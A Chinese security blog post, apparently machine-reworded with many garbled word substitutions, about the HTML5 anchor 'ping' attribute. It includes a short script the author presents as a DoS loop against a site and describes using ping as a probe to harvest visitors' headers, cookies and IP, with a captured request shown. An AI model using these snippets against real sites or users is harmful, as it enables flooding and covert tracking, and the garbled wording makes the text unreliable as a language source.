HTML5：ping属性之殒命ping与隐衷追踪

2015-08-24 19:04:01 暂无评论为者常成网络安全 1,026

在HTML5中a标签参加了一个新的属性ping。设计者参加它的理由是，Ping能够使浏览器对外发送一个异步恳求，通常用来告白的追踪、点击率统计或完成一次HTTP重定向。

但是听到监视、追踪这个词，你是不是也觉得有点不舒服，所以Ping这个属性真的是很不受欢迎。浏览器一度抵制、进而参加默认封闭必须从如config这样的选项中打开才能够应用，到现在我从caniuse.com上还没有追寻到哪个浏览器支持它，但在我测试中最新版Chrome44是默认支持Ping的。

一、Ping的用法

Ping的用法很简略，这里举一个例子。

<a href="https://www.xisigr.com" ping="https://www.xisigr.com/track">click me</a>

当你点击click me的时候，会异步发送一个POST恳求到Ping后面指定的地址，Request Body的内容为PING。有人可能会说，那click me这段代码行不行?答案是否定的，href这个属性必须存在与中，不然Ping也是不会运转的。

二、死亡之PING

根据Ping发送POST恳求这个特征，咱们能够应用循环使之不停的向一个地址追加POST恳求，造成DOS攻打。

<script> var link = document.createElement('a'); link.href=""; link.ping = 'https://www.xisigr.com/'; document.head.appendChild(link); link.click(); </script>

运转上面的代码，就会不停的向xisigr.com发送POST恳求。

请运转在线DEMO：DOS.html {chrome｝

三、隐衷追踪

Ping能够进行告白追踪，它能够统计用户都点击了哪些链接以及次数，并应用POST恳求把这些信息发送到告白商的服务器上。那么POST的这些信息都包含了什么呢，简略来说HTTP Header的内容都会有，咱们来看一个截获的完整信息

HOST: xisigr.comCONTENT-LENGTH: 4ORIGIN: https://mail.163.comPING-FROM: https://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977USER-AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36PING-TO: https://www.baidu.com/CONTENT-TYPE: text/pingACCEPT: */*REFERER: https://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977ACCEPT-ENCODING: gzip, deflateACCEPT-LANGUAGE: zh-CN,zh;q=0.8COOKIE: sessionid=rnbymrrkbkipn7byvdc2hsem5o0vrr13CACHE-CONTROL: max-age=0CONNECTION: keep-alive

PING-FROM、USER-AGENT、REFERER这三个关键信息，直接泄漏了用户的隐衷。而这也为咱们最爱的XSSSHELL又提供了一个小插件。对于图片探针如果没了新鲜感，那么请试试Ping探针吧，简略的一句就搞定!

追踪这事是攻打者的最爱，我简略做了一个DEMO，打开aping.html这个页面，点击后，你会前往wathwg，并且我异步重定向了下w3.org，但同时你的HTTP Header/IP就被我获取到了。你能够通过这个链接查看截获到的信息，Ping.html。

请访问在线DEMO：aping.html Ping.html {chrome}

四、总结

把PING归结为探测用户隐衷的范畴一点也不为过。这其实不怪设计者，Ping的最初设计理念，是为了使得告白统计更加方便简洁，哪怕是它的重定向功能，也是为了在异步恳求的情况下应用户整体提高访问页面速度的快感。但是这仿佛也无法遮掩住PING的潜在探测用户隐衷的特征。也许这就是PING的先天性缺陷。

PS:

HTML5中，a标签多了几个属性，如download/ping。2012年时，我在百度HI写了一篇《HTML5 A[download] 攻打模型》，就对当时download的攻打思路做了简略的分析，可惜百度HI封闭了，download那篇也石沉大海，但三年下来，再看那篇文章，当时提出的一些攻打点，浏览器也已经做了相应的防御，从中看到了攻防对抗的变更和浏览器厂商的激进与妥协。

这种感悟是挺好的，你能够对应着如笔记般的进行标注，这些变更是什么、为什么这么变等等，我觉得应该时不时的把前些年的文章拿出来，和现在的形式对比下，有些东西不得不从这种长时间轴的总结和更新中才能得出结论来，比如10年间消失的10种WEB攻打、浏览器厂商的激进与妥协、10年后WEB是什么样的……

【编辑推荐】